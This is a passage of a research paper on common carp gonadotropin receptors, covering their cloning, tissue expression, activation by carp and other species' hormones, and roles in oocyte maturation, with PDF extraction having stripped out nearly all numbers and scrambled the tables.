commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://phobius.sbc.su.se/ http://spdbv.vital-it.ch/ http://spdbv.vital-it.ch/ https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs pb– : analyzed as described previously ( ). experiments were repeated a minimum of three times from independent transfections and each was performed in triplicate. recombinant gonadotropins used in this study recombinant lh and fsh from tilapia ( , ), sturgeon (acipenser gueldenstaedtii) ( ), and carp ( ) were produced as biologically active, single-chain polypeptides in the methylotrophic yeast, pichia pastoris. recombinant tfsh and tlh were able to stimulate the release of -ketotestosterone ( -kt) from the testes, or the release of estradiol (e ) from the ovaries of tilapia ( , ). recombinant stfsh and stlh were able to elicit the release of e and -kt from ovarian and testis fragments, respectively ( ). recombinant clh enhanced both e figure  maximum likelihood phylogenetic analysis of the lhcgr and fshr from different organisms, the numbers in each branch represents bootstrap percentage values from replicates. each order is highlighted in different color. accession numbers for organisms represented here are detailed in supplementary table . this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs : and α, β, dihydroxy- -pregnen, -one (dhp) secretion, and increased spawning success and fertilization rate when injected to mature female carps in vivo ( ). isolation of carp ovarian follicles and steroid elisa ovaries were collected immediately upon killing the fish and incubated as described previously ( ). after rinsing, the medium was supplemented with either carp pituitary extract (cpe) or graded concentrations of homologous, recombinant clhβα and cfshβα ( , ). the follicles were cleared in sera solution (ethanol:formalin %:acetic acid; : : ) ( ), in order to determine the position of the germinal vesicle (gv) within the translucent oocyte. the number of oocytes at each stage was recorded: stage i: central gv; stage ii: eccentric gv; stage iii: migrating gv; stage iv: gv breakdown (gvbd) and stage v: ovulated eggs. evaluation was done under a microscope (olympus, cx ) with an image-analyzing device. e and dhp concentrations were analyzed by specific elisas ( , ). each experiment was performed on follicles harvested from the same female, and was repeated at least three times. all samples were analyzed in duplicate, and each elisa plate contained a standard curve. the lower limit of detection was . pg/ml for either e or dhp. the intra- and inter-assay coefficients of variation were less than and %, respectively. statistical analyses data are presented as means ± s.e.m. an unequal variance test was performed using jmp . software; in all data the variances of the samples were equal. the significance of differences between group means of expression levels was determined by anova, followed by tukey’s test using graphpad prism . software (san diego, ca, usa). to evaluate the correlation we used a pearson coefficient in the correlation parameter in prism. ec values of the receptors assays were calculated using log agonist versus response on a nonlinear regression curve using prism. results molecular cloning, tissue distribution, and d models of the carp gthrs the cloned cfshr cdna (genbank accession number mh ) is bp in length, containing an orf of bp that encodes a amino acid protein, while the cloned lhcgr cdna (genbank accession number mh ) is bp in length and encodes a protein of amino acids (supplementary fig. ). a putative n-terminal signal peptide of and amino acids were predicted for the fshr and lhcgr, respectively by signalp program analysis (http://www.cbs.dtu.dk/services/ signalp/). like all other gphrs, cfshr and clhcgr contain a very long n-terminal extracellular region ( and amino acids, respectively), a region consisting of seven transmembrane domains, and a c-terminal intracellular tail (supplementary fig. ). we examined a variety of tissues including the brain, pituitary, liver, intestine, spleen, fat, muscle, gills, retina, heart, kidney and gonads for the expression of cfshr and clhcgr. not surprisingly, both fshr and lhcgr were expressed at relatively high levels in the ovary and testis. interestingly, both receptors were expressed in the pituitary, possibly connected to feedback mechanisms. lhcgr was highly expressed in the male pituitary compared to fshr. the expression of lhcgr could be easily detected in the kidney, fat, spleen and gills, whereas fshr was expressed in the retina, gills and front brain (supplementary fig. ). the evolutionary relationship of the cfshr and clhcgr to homologous gphr sequences in other taxa was conducted by performing a phylogenetic analysis using the maximum likelihood method. the overall topology of the phylogenetic tree shows distinct lhcgr and fshr clades, each with highly supported branches for sarcopterygian (mammalian, bird and amphibian molecules) and actinopterygian (fish) lineages. both cfshr and clhcgr grouped with other species in the cypriniformes like zebrafish, grass carp, and rohu, and with different species of catfishes like the channel and north american catfish (fig. ). figure  three-dimensional models of the gonadotropin receptors that were calculated using the i-tasser server and were visualized using swis-spdv viewer. the extracellular domain is marked in red, the seven helices of the transmembrane domain are marked in blue, and the intracellular domain is colored green. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://www.cbs.dtu.dk/services/signalp/ http://www.cbs.dtu.dk/services/signalp/ https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs pb– : three-dimensional models of the carp gthrs were conducted using i-tasser. for each receptor the extracellular region and transmembrane region where modeled separately. the c-scores calculated by itasser for fshr where . and − . for the transmembrane and extracellular regions, respectively. for lhcgr the c-scores where − . and − . for the transmembrane and extracellular regions, respectively (fig. ). functional activation and characterization of carp fshr and lhcgr in order to test for the bioactivity of human and carp gthrs by cpe we transiently expressed each receptor (cfshr, clhcgr, hufshr or hulhcgr) in cos- cells, together with the reporter construct, pcre-luc. cpe more effectively activated clhcgr than cfshr in terms of maximal response and effective dose. the human gthrs were not activated by cpe (fig. ). we next aimed to test the response of the cloned cfshr and clhcgr by stimulating transfected cos- cells with various doses of single-chain cgths ( . – ng/ml). recombinant clh activated camp signaling via clhcgr in a dose-dependent manner (ec = . ng/ml). moreover, recombinant clh also activated cfshr in a dose-dependent manner (ec = . ng/ml), while cfsh activated only its cognate fsh-r (ec = . ng/ml). both gonadotropins activated cfshr with a similar ec and maximal response, while activation of cfshr was achieved mainly by clh (fig. and table ). to further characterize the novel cfshr and clhcgr, we tested the potential activation of intra- and inter- species gonadotropins. we used recombinant single- chain lh or fsh from a non-teleost russian sturgeon (acipenseriformes) ( ), carp (cypriniformes) ( ), a recently evolved teleost (nile tilapia), perciformes; oreochromis niloticus ( , ), or human fsh or chorionic gonadotropin (hcg). to better compare between the activity of each ligand and the different receptors we ignored the ec of ligands that did not activate the receptor in a maximal fold change higher than . (marked as n/a in table ). clhcgr-transfected cells responded to hcg, tlh and also tfsh, while cfshr-transfected cells responded only to hfsh and tfsh (fig. and table ). expression of ovarian fshr and lhcgr during sexual maturation in female carp we next aimed to study the expression levels of both cfshr and clhcgr throughout the reproductive cycle of the female carp in parallel to ovarian development. at the primary growth stage (pg, follicle diameter – µm) - - - - - - - cfshr clhcgr hulhcgr hufshr cpe [dilutions ( : )] lu ci fe ra se a ct iv ity (r at io to b as al ) figure  carp and human gonadotropin receptors stimulated cre-luc activity in response to cpe. cos- cells were transiently co-transfected with reporter plasmid pcre-luc and carp gonadotropin receptors (cfshr, clhcgr) or human gonadotropin receptors (hufshr, hulhcgr). cells were stimulated for  h with decimal dilutions of cpe. luciferase activity was determined and results are presented as a ratio to basal stimulation. each assay was repeated at least three times. data are presented as mean ± s.e.m. of a representative experiment, performed in triplicate. figure  carp gonadotropin receptors stimulated by carp (c) recombinant gonadotropins. cos- cells were transiently co-transfected with clhcgr (a) or cfshr (b) with the reporter plasmid pcre-luc. cells were stimulated for  h with graded concentrations of recombinant clh or cfsh. luciferase activity was determined and results are presented as a ratio to basal stimulation. each assay was repeated at least three times. data are presented as mean ± s.e.m. of a representative experiment, performed in triplicate. cfshr . . . . . . . log (gthng/ml)log (gthng/ml) lu ci fe ra se a ct iv ity (r at io to b as al ) lu ci fe ra se a ct iv ity (r at io to b as al ) a bclhcgr . . . . . . carprecfsh carpreclh this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs : both fshr and lhcgr had extremely low levels of expression. the expression of fshr significantly increased during early vitellogenesis, until follicle maturation. in contrast, the expression of lhcgr increased more gradually, becoming significant only at the mid-vitellogenic stage with the highest expression in mature follicles (fig. ). relationships between pituitary mrna levels of pituitary gths, ovarian gth-rs, and gsi given the promiscuity of the gonadotropin receptors in the carp, it was interesting to test the correlation between mrna levels of the gonadotropin ligands vs mrna levels of the different gth-rs. clhcgr and cfshr mrna levels significantly correlated with each other throughout the reproductive cycle. gsi was also highly correlated to both clhcgr and cfshr mrna levels, while the mrna of lhb in the pituitary was correlated to the mrna levels of both gthrs in the ovary. however, pituitary mrna levels of fshb were significantly correlated only to ovarian cfshr (table ). in vitro effect of carp recombinant gths on gvbd of preovulatory follicles taking in account the promiscuity of the cgthrs, the next experiment was designed in order to answer the question whether cfsh and/or clh can induce gvbd. we recently showed that the pituitary content of the various gonadotropins in the carp pituitary differ dramatically, when cpe contained milligrams clh and only nanograms of cfsh ( ). thus, we used higher concentration of recombinant clh ( – ng/ml) than recombinant cfsh ( – ng/ml) in order to induce gvbd in vitro. interestingly, the maturational response significantly increased when increasing concentrations of both fsh and lh were used. although no significant gvbd count difference was evident in response to graded dilutions of cpe, a trend of increase in the amount of mature follicles was observed (fig. ). we further analyzed the steroid profile of the preovulatory follicles incubated with cpe or recombinant carp gonadotropins (fig. ). varying dilutions of cpe did not affect dhp or estradiol levels. increasing doses of cfsh significantly elevated dhp concentrations, and all the tested doses of cfsh decreased estradiol concentrations. high doses of recombinant clh significantly increased dhp, but estradiol only demonstrated a negative trend with increasing recombinant clh.ta b le   ec v al u es (n g/ m l) fi t to a n o n -li n ea r re gr es si o n a n d t h e m ax im al r es p o n se (f o ld c h an ge ; m a x) o f g th -s ti m u la te d c ar p g o n ad o tr o p in r ec ep to rs (c fs h r , lh c g r ) i n r ec ep to r ac ti va ti o n a ss ay s (f ig s an d ). cf sh cl h tf sh tl h h c g h fs h st fs h st lh ec (n g/ m l) m a x (f o ld ch an ge ) ec (n g/ m l) m a x (f o ld ch an ge ) ec (n g/ m l) m a x (f o ld ch an ge ) ec (n g/ m l) m a x (f o ld ch an ge ) ec (n g/ m l) m a x (f o ld ch an ge ) ec (n g/ m l) m a x (f o ld ch an ge ) ec (n g/ m l) m a x (f o ld ch an ge ) ec (n g/ m l) m a x (f o ld ch an ge ) cf sh r . . . . . n /a . n /a . . n /a . . . cl h c g r n /a . . . . . . . . . . . n /a . n /a . st im u la n ts w it h m ax im u m f o ld c h an ge lo w er t h an . o r w it h o u t a si gm o id r es p o n se w er e co n si d er ed in ac ti ve a n d r ep re se n te d w it h n /a v al u e. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs pb– : discussion the duality of fish gonadotropins and their receptors was established years ago ( ), but the evolutionary trend of specific fshr and lhcgr activation by the gonadotropins, cognate or heterologous, in different fish species is unknown. in the current study, we cloned the full-length cdnas for fshr and lhcgr of the common carp and analyzed their expression profiles during the female reproductive cycle. we additionally studied the ability for homologous and heterologous gths to activate camp signaling via the clhcgr or cfshr in an attempt to characterize a functional evolutionary model that summarizes the permissive actions of fish gthrs. the current accepted model of the specific, distinct functions of fsh and lh in fish emerged from studies on salmonids, which spawn once per life or in a year and have synchronously developing ovaries. in the salmon, fsh and lh are discretely and temporally secreted during the reproductive cycle, where fsh is mainly secreted during the long phase of vitellogenesis and lh is secreted during final oocyte maturation and ovulation ( ). additionally, female amago salmon fshr mrna expression was high during the early stages of vitellogenesis and gradually decreased as gonadal maturational ensued, while lhcgr expression peaked during final maturation ( ). similar seasonal patterns were reported in the oogenesis of another synchronous figure  carp gonadotropin receptors stimulated by recombinant gonadotropins of human (a and b), tilapia (c and d) or sturgeon (e and f). cos- cells were transiently co-transfected with clhcgr (a, c and e) or cfshr (b, d and f) and with the reporter plasmid pcre-luc. cells were stimulated for  h with graded concentrations of tilapia (t), human (h), and sturgeon (st) recombinant gonadotropins. luciferase activity was determined and results are presented as a ratio to basal stimulation. each assay was repeated at least three times. data are presented as mean ± s.e.m. of a representative experiment, performed in triplicate. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs : spawner, the channel catfish ( ). however, the carp is a total spawner; i.e., when maturation of the gonads begins, all the eggs or sperm develop synchronously. hormonal levels, histological observations and gene expression revealed that for the carp, oocytes during the cortical alveolus stage appeared when follicle diameter was – µm, vitellogenesis then started and was completed when follicle diameter was – during february. the spawning season was between april and june, which corresponded with a significant increase in the gsi, dhp, and estradiol levels ( , ). however, although the carp is a total spawner, mrna levels of both fshr and lhcgr were low during vitellogenesis and increased concomitantly toward oocyte maturation, where fshr level increased earlier than lhcgr. in the ovary of the rohu (labeo rohita), an indian carp which is also a total- spawner, fshr gene expression was also enhanced from the primary growth stage to the pre-spawning phase and maintained at the same level during the spawning phase, while lhcgr expression enhanced from the primary growth stage to pre-spawning phase, reaching a peak at the spawning phase ( ). this is in accordance with our previous results showing that lh pituitary content and mrna levels were low at pre- and early vitellogenesis, reached a peak in mid-vitellogenic ovary, and a peak of lh content in fully grown ovarian follicles ( ). however, no significant change occurred in fsh pituitary content and mrna levels between vitellogenic fish and fish at the figure  changes in fshr and lhcgr mrna expression in the ovary at various stages of gonadal maturation as determined by real-time pcr. fold expression was normalized to the geometric mean of ef- α and β-actin by the comparative threshold cycle method (∆ct). results are shown as mean ± s.e.m. (n =  – ). means marked with different capital letters have statistically different lhcgr expression, and means marked with different lower-case letters differ significantly in fshr expression (p <  . ). the ovarian developmental stage of each fish was determined with hematoxylin and eosin-stained histological sections of carp ovary in different maturation phases according to oocyte diameter; the stages are represented in the bottom of the graph. the primary growth (pg) stage contains mainly prenuclear follicles with big central nucleus. the previtellogenic (pv) stage contains some larger follicles with cortical alveoli in their cytoplasm. the early vitellogenic (ev) stage contains large follicles with oil vacuoles and yolk granules accumulated in the cytoplasm. the mid- vitellogenic (mv) stage contains follicles where the germinal vesicle starts its migration to the periphery and the yolk granules become yolk plates. mature follicles (mf) went through the dehydration stage where the follicle reaches to its maximum growth. table  correlation tests between the mrna levels of the gonadotropin receptors and the mrna levels of the gonadotropins ( ) and gsi. lhβ fshβ clhcgr gsi vs fshβ vs clhr vs cfshr vs clhr vs cfshr vs cfshr clhr cfshr number of xy pairs pearson r . . . . . . . . p value (two-tailed) . . . . . . < . < . p value summary a a ns ns a b b b is the correlation significant? (alpha =  . ) yes yes no no yes yes yes yes r squared . . . . . . . . correlation was performed using graphpad prism program v . ap< . ; bp< . . this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs pb– : final stages of maturation ( ). in goldfish too, lh was found to be present throughout the reproductive cycle, leading to the conclusion that mainly lh was involved in regulating gonadal steroidogenesis, gametogenesis, and ovulation ( ). in line with these data, increases in fshr gene expression have been correlated with later events of the reproductive cycle including the oocyte maturation and ovulation in the rainbow trout ( ), zebrafish ( ) and tilapia ( ). these data suggest that piscine gonad development and maturation depends on a specific gonadotropin profile that does not reflect the temporally distinct dual-gonadotropin model observed in salmonids or mammals. dhp is known as the maturation-inducing steroid in most fish species (reviewed in ( )). one of the major endocrine events associated with termination of vitellogenesis and meiosis resumption is an lh-driven shift in the ovarian follicle steroidogenic pathway from the production of predominantly estradiol during vitellogenesis to the production of dhp ( ). this switch is associated with decreased expression of cytochrome p aromatase ( ). we show here that both recombinant cfsh and clh successfully induced gvbd in the carp. similar results were found in the walking catfish where both semi-purified lh and fsh induced gvbd in vitro ( ). moreover, dhp levels significantly increased in response to both gonadotropins, while estradiol decreased only in response to recombinant cfsh. we previously showed that injection of the resolving high dose of cpe resulted in a shift in the main ovarian steroid from estradiol to dhp ( ). incubation of carp ovarian fragments with both fsh and lh from various piscine sources also resulted in an increase of both estradiol and dhp secretion ( ). the acquisition of follicular maturational competence that naturally occurs during post-vitellogenesis in the carp also corresponds to an increase of follicular responsiveness to both gonadotropins. taken together, these data suggest that fsh induces dhp production/secretion, not through binding to the lhcgr, but rather by cognate binding to fshr, which results with dhp secretion. it is accepted that receptor binding domains and their ligands experience co-evolution, where reciprocal restrictions are applied over evolutionary time ( ). previously, fish gth specificity has been viewed from too large of a vista under the assumption that evolutionary rate and polyploidization of the genome contribute to permissive gthr activation. the gonadotropin beta subunits are encoded by paralogous genes descending from a common ancestor and share about % sequence identity (for both human and carp). the corresponding receptors are also encoded by paralogous genes and, accordingly, they also display about % sequence identity in their hormone-binding ectodomain. in contrast, the effector domains of the receptors share higher sequence identity (about % for both human and carp), which suggests that they fulfill essentially the same function – activation of gαs. the hypothesis that earlier evolved lineages have a more fundamental gthr sequence that would facilitate the activation of any later evolved gth has received mixed support ( , , ). . . . . stage i-iii stage iv stage v cpe [pit/ml] o oc yt e m at ur at io na l s ta ge (% ) o oc yt e m at ur at io na l s ta ge (% ) o oc yt e m at ur at io na l s ta ge (% ) stage i-iii stage iv stage v stage i-iii stage iv stage v * * * r-clh [ng/ml] * * r-cfsh [ng/ml] a b c figure  induced maturation progress of common carp ovarian follicles after -h stimulation in the germinal vesicle break down assay applying carp pituitary extract (cpe with a concentration of .  mg/pit clh and .  ng/pit cfsh) (a), recombinant clh (r-clh) (b) and recombinant cfsh (r-cfsh) (c). data are presented as mean ± s.e.m. and statistically significant differences between treatments and control are highlighted with * (p <  . ). this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs : however, fish receptors respond to mammalian gonadotropins, but human receptors are not activated by fish ligands ( ) (fig. ). sea bass fshr was specifically stimulated by bovine fsh, while sea bass lhcgr could be activated by both bovine lh and fsh, demonstrating not only inter-species activation, but also cross-reactivity of the gths ( ). this is also true of the eel lhcgr, which could be activated by hfsh, hcg, and even trout fsh ( ). in addition to inter-species cross activation, in zebrafish and african catfish, homologous lh binds both gthrs, whereas fsh binds only its own cognate receptor ( , , ) (fig. ). our results showed a certain degree of inter- species cross-reactivity, where clhcgr was activated by tfsh, tlh, hcg and hfsh, and cfshr was activated by tfsh, hfsh, and stlh. both cgthrs, along with other teleost species, permit inter-species gth cross-reactivity, figure  effects of different doses of carp pituitary extract (cpe) with a concentration of .  mg/pit of clh and .  ng/pit of cfsh (a and d), recombinant cfsh (r-cfsh; b and e) and recombinant clh (r-clh; c and f) on e (a, b and c) and dhp (d, e and f) secretion in vitro by intact preovulated ovarian follicles. each point represents the mean ± s.e.m. of follicles from three different fish per treatment group, with three replicates (n =  ). means marked by different letters differ significantly (p <  . ). . . . . a a a a a cpe dilutions e [p g/ fo lli cl e] a b b b b rfsh (ng/ml) e [p g/ fo lli cl e] a a a a a rlh (ng/ml) rlh (ng/ml) e [p g/ fo lli cl e] . . . . . . . . . . . . a a a a a cpe dilutions d h p [p g/ fo lli cl e] aa b b c rfsh (ng/ml) d h p [p g/ fo lli cl e] . . . . . . . . . . a a b b b d h p [p g/ fo lli cl e] a b c d e f figure  a model describing the specificity of gonadotropins binding to their cognate receptors in representative species of fish from different piscine orders. the taxonomic tree and the selection of different order groups was done using taxonomy browser (ncbi) and the design was performed in evolview (http:// www.evolgenius.info/evolview). this model was created using studies where homologous recombinant gonadotropins were used: ( ) for the rainbow trout (oncorhynchus mykiss); ( ) for zebrafish, ( , ) for african catfish (clarias gariepinus), ( , ) for sea bass (dicentrarchus labrax); ( ) for mummichog (fundulus heteroclitus); ( ) for eel, tilapia and human; ( ) for atlantic halibut (hippoglossus hippoglossus); ( ) for amago salmon (oncorhynchus rhodurus); ( ) for manchurian trout (brachymystax lenok); and ( ) for elephant shark (callorhinchus milii). this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://www.evolgenius.info/evolview http://www.evolgenius.info/evolview https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs pb– : implicating a functionally basic property of these gthrs. however, these functional observations are complicated by a complex evolutionary history of the teleosts which may or may not have a demonstrated trend. in the view of the expansive teleost radiation, it seems most appropriate to conclude that permissive gthr activation is a consequence of lineage-specific, biologically relevant events, and not a less-evolved theme for the entire infraclass (fig. ). the response of the clhcgr to the homologous pituitary extract was twice that for cfshr. this can be due to the higher levels of clh in the pituitary ( ), and also to the higher number of lh-secreting cells in the pituitary of mature fish as was shown for zebrafish and tilapia ( , ). the clhcgr and cfshr ecds have a more neutral concave surface potential, but differ in the ecd terminals where clhcgr has strong basic and acidic propensities on the n- and c-terminal sides of the ecd, respectively, and the cfshr has a weaker acidic n-terminal propensity that covers more surface than clhcgr and a weakly basic c-terminus. we showed that recombinant clh and cfsh both activate cfshr, but clhcgr was only activated by its cognate ligand. we also observed heterologous activation of clhcgr with tilapia and human fsh and cfshr with sturgeon lh. interestingly, stfsh and hcg did not activate clhcgr and cfshr, respectively, perhaps alluding to some species-specific binding and activation determinants. the generally weaker proximal charges of the cfshr ecd could permit more permissive initial binding, but recognition specificity is not equivalent to functional specificity. the lrr domain is involved in initial recognition and binding to the receptor; however, the signal specificity domain (ssd; ‘hinge’) and the extracellular loops of the tmd bridge the gap between hormone binding and receptor activation ( ). the ssd is located between the last repeat of the lrr domain and the first helix of the tmd, and provides a high-affinity binding site in addition to the lrr domain ( ). it is characterized by having two highly conserved cysteine-rich boxes (cb- and cb- ) that form important disulfide bridges and key determinant residues for hormone binding and receptor conformational changes ( ). teleost fshrs lack approximately amino acids between conserved cysteine and of cb- / compared with human and chicken fshr, resulting in a shorter hinge loop that could influence the degree of secondary ligand binding and activation. this same region in the lhcgr of teleosts is variable in size, but is longer than their fshr counterparts. a conserved sulfated tyrosine residue (y of hfshr, y of hlhcgr) found in the ssd is indispensable for binding and subsequent activation ( ). the principal binding of a gph to the lrr domain causes a low-structured loop of the ssd containing the sulfated tyrosine to move into an exposed hydrophobic pocket between the alpha and beta subunits of the gph ( ). clhcgr and fshr do have conserved tyrosine residues in this region (y and y , respectively), but there are no data addressing the presence of a sulfate moiety on these residues in fish. the differences in overall electrostatic potential of the ecd, length of the ssd, and various binding residues between clhcgr and cfshr contribute to the permissive actions of these receptors, but further experimentation will be required in order to determine the exact factors that govern gth binding specificity in fish. we have demonstrated here that the specific role of the two gonadotropins might be different in carp than in the accepted model. our data support the hypothesis that fish gonadotropin and receptor expression and interaction profiles are different than those of other vertebrate lineages due to the vast radiation of teleosts and their reproductive strategies in diverse ecological niches. furthermore, we suggest that the permissive activation of the fish gonadotropin receptors, which was previously attributed to all fish species, is mainly a characteristic of ostariophysi species. supplementary data this is linked to the online version of the paper at https://doi.org/ . / ec- - . declaration of interest the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. funding this project has received funding from the european union’s horizon research and innovation program under the marie sklodowska-curie grant agreement no – impress. knh was supported by bard, the united states – israel binational agricultural research and development fund, vaadia-bard postdoctoral fellowship award no. fu- - . references levavi-sivan b, bogerd j, mananos el, gomez a & lareyre jj. perspectives on fish gonadotropins and their receptors. general and comparative endocrinology – . (https://doi. org/ . /j.ygcen. . . ) pierce jg & parsons tf. glycoprotein hormones: structure and function. annual review of biochemistry – . (https:// doi.org/ . /annurev.bi. . . ) braun t, schofield pr & sprengel r. amino-terminal leucine- rich repeats in gonadotropin receptors determine hormone selectivity. embo journal – . (https://doi. org/ . /j. - . .tb .x) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /ec- - https://doi.org/ . /ec- - https://doi.org/ . /j.ygcen. . . https://doi.org/ . /j.ygcen. . . https://doi.org/ . /annurev.bi. . . https://doi.org/ . /annurev.bi. . . https://doi.org/ . /j. - . .tb .x https://doi.org/ . /j. - . .tb .x https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com l hollander-cohen et al. ontogeny of the specificity of fish gth-rs : yaron z. endocrine control of gametogenesis and spawning induction in the carp. aquaculture – . (https://doi. org/ . / - ( ) -h) jones dt, taylor wr & thornton jm. the rapid generation of mutation data matrices from protein sequences. computer applications in the biosciences – . (https://doi. org/ . /bioinformatics/ . . ) kumar s, stecher g & tamura k. mega : molecular evolutionary genetics analysis version . for bigger datasets. molecular biology and evolution – . (https://doi.org/ . /molbev/ msw ) roy a, kucukural a & zhang y. i-tasser: a unified platform for automated protein structure and function prediction. nature protocols – . (https://doi.org/ . /nprot. . ) zhang y. i-tasser server for protein d structure prediction. bmc bioinformatics . (https://doi.org/ . / - - - ) hollander-cohen l, golan m, aizen j, shpilman m & levavi- sivan b. characterization of carp gonadotropins: structure, annual profile, and carp and zebrafish pituitary topographic organization. general and comparative endocrinology – . (https://doi. org/ . /j.ygcen. . . ) levavi-zermonsky b & yaron z. changes in gonadotropin and ovarian-steroids associated with oocytes maturation during spawning induction in the carp. general and comparative endocrinology – . (https://doi.org/ . / - ( ) - ) biran j, ben-dor s & levavi-sivan b. molecular identification and functional characterization of the kisspeptin/kisspeptin receptor system in lower vertebrates. biology of reproduction – . (https://doi.org/ . /biolreprod. . ) sivakumaran kp, brown p, stoessel d & giles a. maturation and reproductive biology of female wild carp, cyprinus carpio, in victoria, australia. environmental biology of fishes – . (https:// doi.org/ . /a: ) vazirzadeh a, amiri bm & fostier a. ovarian development and related changes in steroid hormones in female wild common carp (cyprinus carpio carpio), from the south-eastern caspian sea. journal of animal physiology and animal nutrition – . (https://doi.org/ . /jpn. ) yaron z & levavi-zermonsky b. fluctuations in gonadotropin and ovarian-steroids during the annual cycle and spawning of the common carp. fish physiology and biochemistry – . (https://doi.org/ . /bf ) levavi-sivan b, biran j & fierman e. sex steroids are involved in the regulation of gonadotropin-releasing hormone and dopamine d receptors in female tilapia pituitary. biology of reproduction – . (https://doi.org/ . /biolreprod. . ) deloffre la, andrade a, filipe ai & canario avm. reference genes to quantify gene expression during oogenesis in a teleost fish. gene – . (https://doi.org/ . /j.gene. . . ) guzman jm, luckenbach ja, yamamoto y & swanson p. expression profiles of fsh-regulated ovarian genes during oogenesis in coho salmon. plos one e . (https://doi.org/ . /journal. pone. ) levavi-sivan b, aizen j & avitan a. cloning, characterization and expression of the d dopamine receptor from the tilapia pituitary. molecular and cellular endocrinology – . (https://doi. org/ . /j.mce. . . ) aizen j, kobayashi m, selicharova i, sohn yc, yoshizaki g & levavi- sivan b. steroidogenic response of carp ovaries to piscine fsh and lh depends on the reproductive phase. general and comparative endocrinology – . (https://doi.org/ . /j. ygcen. . . ) kasuto h & levavi-sivan b. production of biologically active tethered tilapia lhβα by the methylotrophic yeast pichia pastoris. general and comparative endocrinology – . (https://doi. org/ . /j.ygcen. . . ) aizen j, kasuto h, golan m, zakay h & levavi-sivan b. tilapia follicle-stimulating hormone (fsh): immunochemistry, stimulation by gonadotropin-releasing hormone, and effect of biologically active recombinant fsh on steroid secretion. biology of reproduction – . (https://doi.org/ . /biolreprod. . ) yom-din s, hollander-cohen l, aizen j, boehm b, shpilman m, golan m, hurvitz a, degani g & levavi-sivan b. gonadotropins in the russian sturgeon: their role in steroid secretion and the effect of hormonal treatment on their secretion. plos one e . (https://doi.org/ . /journal.pone. ) aizen j, hollander-cohen l, shpilman m & levavi-sivan b. biologically active recombinant carp lh as a spawning inducing agent for carp. journal of endocrinology – . (https:// doi.org/ . /joe- - ) miwa s, yan lg & swanson p. localization of two gonadotropin receptors in the salmon gonad by in vitro ligand autoradiography. biology of reproduction – . (https://doi.org/ . / biolreprod . . ) swanson p, dickey jt & campbell b. biochemistry and physiology of fish gonadotropins. fish physiology and biochemistry – . (https://doi.org/ . /b:fish. . . ) hirai t, oba y & nagahama y. fish gonadotropin receptors: molecular characterization and expression during gametogenesis. fisheries science – . (https://doi.org/ . /fishsci. . sup _ ) kumar gs, singh isb & philip r. development of a cell culture system from the ovarian tissue of african catfish (clarias gariepinus). aquaculture – . (https://doi.org/ . /s - ( ) - ) pradhan a, nayak m, samanta m, panda rp, rath sc, giri ss & saha a. gonadotropin receptors of labeo rohita: cloning and characterization of full-length cdnas and their expression analysis during annual reproductive cycle. general and comparative endocrinology – . (https://doi.org/ . /j. ygcen. . . ) aizen j, kasuto h & levavi-sivan b. development of specific enzyme- linked immunosorbent assay for determining lh and fsh levels in tilapia, using recombinant 